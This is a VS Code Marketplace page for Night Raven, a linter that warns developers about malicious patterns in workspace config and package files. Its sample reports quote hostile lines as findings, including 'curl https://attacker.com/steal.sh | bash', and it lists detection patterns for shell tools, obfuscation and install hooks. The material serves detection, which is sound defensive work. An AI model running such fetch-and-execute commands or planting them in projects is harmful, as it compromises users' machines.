Skip to content
| Marketplace
Sign in
Visual Studio Code>Linters>Night RavenNew to Visual Studio Code? Get it now.
Night Raven

Night Raven

SoulNest

|
3 installs
| (0) | Free
Information Leakage Alarm for VS Code - Detects suspicious patterns and configurations.
Installation
Launch VS Code Quick Open (Ctrl+P), paste the following command, and press enter.
Copied to clipboard
More Info

Night Raven - 정보유출 경보기

GitHub

VS Code용 정보 유출 경보기 확장 프로그램으로, 개발자에게 작업 공간의 잠재적으로 악의적인 패턴, 난독화된 코드 및 의심스러운 구성에 대해 경고합니다.

Night Raven 이란? 치료하는 백신이 아니라 경고하는 가디언입니다. 의심스러운 코드 패턴을 실행하기 전에 감지하고 경고합니다.

🦅 Features

  • Real-time Threat Detection: Monitors .vscode/tasks.json, launch.json, settings.json, and package.json for suspicious patterns
  • Pattern Recognition: Scans for RCE (remote code execution), network calls, code obfuscation, and dangerous file system operations
  • Risk Scoring: Calculates overall risk level based on threat severity
  • Integrity Verification: Hash-based detection of file tampering
  • File Locking: Prevent execution of suspicious files by setting read-only mode
  • Encrypted Storage: Secure sensitive information with AES-256-GCM encryption
  • Visual Reports: Beautiful, detailed threat reports with actionable recommendations
  • CLI Support: Run scans from the command line
  • All Features Free: Open source tool with no paid tiers

🎯 Use Cases

  • Supply Chain Security: Detects malicious npm install scripts and postinstall hooks
  • VS Code Config Monitoring: Alerts when tasks.json contains suspicious shell commands
  • Developer Awareness: Warns before executing potentially dangerous configurations
  • APT Defense: Detects common attack patterns used in advanced threats

💻 About the Creator

Built by the creator of GitGoing - a VS Code extension that resolves merge conflicts intelligently.

📦 Installation

Download the VSIX file and install in VS Code:

  1. Open VS Code
  2. Go to Extensions
  3. Click "Install from VSIX"
  4. Select the night-raven-1.0.0.vsix file

Or install via command line:

code --install-extension night-raven-1.0.0.vsix

🚀 Usage

Quick Scan with Status Bar Icon

  • Look for the 🦅 Raven icon in the VS Code status bar (bottom right)
  • Click the icon to instantly scan your workspace
  • Results appear in the notification panel

Automatic Monitoring

Night Raven automatically monitors critical files and alerts you when threats are detected.

Manual Scanning

  • Open Command Palette (Ctrl+Shift+P / Cmd+Shift+P)
  • Run: Night Raven: Scan Workspace
  • View detailed threat reports in the webview panel

CLI Mode

# Scan current directory
npx night-raven

# Scan specific project
npx night-raven /path/to/project

# Example
npx night-raven /Users/admin/Desktop/night-raven-test

Output:

🦅 Night Raven CLI

⚠️  22 threat(s):

🔴 [CRITICAL] RCE
   package.json:0
   curl https://attacker.com/steal.sh | bash

🟠 [HIGH] NETWORK
   package.json:0
   http://malicious-site.com/payload.exe

⚡ Risk: 500

Exit code: 1 (if CRITICAL threats found), 0 (if safe)

🔬 Proof of Concept (PoC)

To verify Night Raven's detection capabilities, you can use the included poc-malicious-package.json file.

  1. Create a test directory:

    mkdir poc-test
    
  2. Copy and rename the malicious PoC file: Copy the poc-malicious-package.json file into the poc-test directory and rename it to package.json.

  3. Scan the directory with Night Raven CLI: Run the CLI command to scan the specific test directory.

    npx night-raven ./poc-test
    
  4. Check the results: Night Raven will detect the threats within the malicious package.json and generate a report.

    PoC Result 1 PoC Result 2

🔍 What It Detects

Critical Threats (RCE)

  • Shell execution commands: curl, wget, powershell, bash, eval, etc.
  • Node.js code execution: child_process.exec, node -e, etc.

High-Risk Patterns

  • External network calls: fetch, axios, http.get, socket
  • Environment variable access: process.env, ${env:...}
  • Code obfuscation: String.fromCharCode, atob/btoa, hex escapes

Medium-Risk Patterns

  • File system operations: fs.writeFile, fs.unlink, fs.rm
  • Dangerous npm hooks: preinstall, postinstall, preuninstall

🎨 Alert Colors & Status

Night Raven provides visual feedback based on threat severity:

Icon Location Alert Color Meaning Example
Status Bar (🦅) 🔴 Red CRITICAL threats detected RCE attacks found
Status Bar (🦅) 🟠 Orange HIGH threats only Network/obfuscation patterns
Status Bar (🦅) 🔵 Blue MEDIUM/LOW threats only Minor file system access
Status Bar (🦅) ✅ Safe No threats found Workspace is clean

Alert Details

  • 🔴 Red (Error): CRITICAL threats - Do not run until reviewed
  • 🟠 Orange (Warning): HIGH threats - Manual inspection recommended
  • 🔵 Blue (Info): MEDIUM/LOW threats - Monitor and review

⚠️ Important Note

Night Raven is a detection and alerting tool, not a protection mechanism. It warns you about suspicious patterns so you can make informed decisions before executing code. It does not prevent or block execution.

📊 Threat Report Example

🦅 Night Raven Security Report
Total: 3 threat(s) | Risk Score: 150

[CRITICAL] RCE in tasks.json:5
  Pattern: curl https://suspicious-site.com | bash
  Recommendation: Remove or verify this command

[HIGH] NETWORK in package.json:0
  Pattern: fetch external resource in postinstall hook
  Recommendation: Verify external dependencies

🛠️ Version

1.0.0

📄 License

MIT

🤝 Contributing

Contributions welcome! Please submit issues and PRs on GitHub. https://github.com/soulnest-git/night-raven

🔗 Related Projects

  • GitGoing - Intelligent merge conflict resolution for VS Code
  • Contact us
  • Jobs
  • Privacy
  • Manage cookies
  • Terms of use
  • Trademarks
© 2026 Microsoft